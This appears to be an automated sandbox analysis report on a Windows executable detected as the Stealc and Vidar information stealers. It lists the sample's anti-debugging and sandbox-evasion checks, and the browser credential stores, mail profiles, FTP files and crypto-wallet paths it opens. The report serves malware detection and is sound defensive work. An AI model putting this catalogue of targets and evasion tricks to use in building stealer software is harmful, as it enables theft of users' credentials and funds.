Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0018D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0018D8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001939B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_001939B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0018E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0018E270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001943F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_001943F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0018BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0018BCB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0018F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0018F4F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00181710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00181710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00194050 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00194050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0018EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0018EB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001933C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_001933C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0018DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0018DC50

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00197970 GetSystemInfo,wsprintfA,

0_2_00197970

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: AEBKKECB.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: AEBKKECB.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: AEBKKECB.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: AEBKKECB.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: AEBKKECB.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: AEBKKECB.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2266753838.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AEBKKECB.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: AEBKKECB.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: AEBKKECB.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: AEBKKECB.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW5~
Source: AEBKKECB.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: AEBKKECB.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: AEBKKECB.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: AEBKKECB.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: AEBKKECB.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: AEBKKECB.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: AEBKKECB.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: AEBKKECB.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: AEBKKECB.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: AEBKKECB.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: AEBKKECB.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: AEBKKECB.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: AEBKKECB.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: AEBKKECB.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: AEBKKECB.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: AEBKKECB.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: AEBKKECB.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwarexC
Source: file.exe, 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: AEBKKECB.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: AEBKKECB.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: AEBKKECB.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: AEBKKECB.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-59520
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58333
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58330
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58351
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58385
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58345

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6D5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6C6D5FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00184610 VirtualProtect ?,00000004,00000100,00000000

0_2_00184610

Source: C:\Users\user\Desktop\file.exe

0_2_00199270

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00199160 mov eax, dword ptr fs:[00000030h]

0_2_00199160

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00185000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00185000

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6C6AB66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6C6AB1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_001990A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_001990A0

Source: file.exe, file.exe, 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: MeProgram Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6AB341 cpuid

0_2_6C6AB341

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00197630

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_001963C0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_001963C0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_001972F0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_001972F0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_001974D0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_001974D0

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.'

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

